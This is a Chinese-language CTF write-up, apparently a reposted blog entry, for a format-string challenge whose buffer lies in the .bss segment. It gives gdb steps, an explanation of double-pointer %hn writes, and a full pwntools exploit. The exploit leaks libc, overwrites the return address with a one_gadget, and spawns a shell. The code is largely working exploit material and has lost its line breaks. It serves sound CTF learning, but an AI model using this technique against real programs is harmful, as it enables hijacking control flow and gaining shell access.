本文共 1863 字，大约阅读时间需要 6 分钟。

fmt在bss段(neepusec_easy_format)

1.gdb操作

• vmapp

  

• stack

  

• retaddr

  

2.思路

1. 先泄漏能够泄漏的地址包括:当前站地址、libc地址

2. 然后通过下面的指令进行地址写

   #这里是只要覆盖偏移为12的地址值的后两个字节debug()offset0 = ret&0xffffpayload = '%'+str(offset0)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()#这里覆盖偏移为25的地址值的后两个字节offset1 = one&0xffffpayload = '%'+str(offset1) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()#修改的永远是指针指向的值#############################################payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset2 = 0xffff&(one>>16)payload = '%'+str(offset2) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')

3. 修改流程

   1. 未修改前

      

   2. 第一次修改

      

   3. 第二次修改

      

   4. 第三次修改

      

4. 注意!!!每次修改的值都是二级指针指向的值,不能直接修改

   

3. exp

from pwn import *from LibcSearcher import *p = process('./pwn')#p = remote('neepusec.club',18757)elf = ELF('./pwn')context.log_level = 'debug'def debug():    gdb.attach(p)    pause()payload = '\x00'p.sendlineafter(':\n',payload)p.send('aaaa%23$pbbbb%8$p')p.recvuntil('aaaa0x')__libc_start_main = int(p.recv(12),16)-231log.success('__libc_start_main===>'+hex(__libc_start_main))libc = LibcSearcher('__libc_start_main',__libc_start_main)libc_base = __libc_start_main - libc.dump('__libc_start_main')log.success('libc_base==>'+hex(libc_base))one = [0x4f3d5,0x4f432,0x10a41c]one = one[0]+libc_baselog.success('one==>'+hex(one))p.recvuntil('bbbb0x')ret = int(p.recv(12),16) + 8log.success('ret==>'+hex(ret))debug()offset0 = ret&0xffffpayload = '%'+str(offset0)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset1 = one&0xffffpayload = '%'+str(offset1) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset2 = 0xffff&(one>>16)payload = '%'+str(offset2) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()p.sendline('ls')p.interactive()

转载地址：http://htugf.baihongyu.com/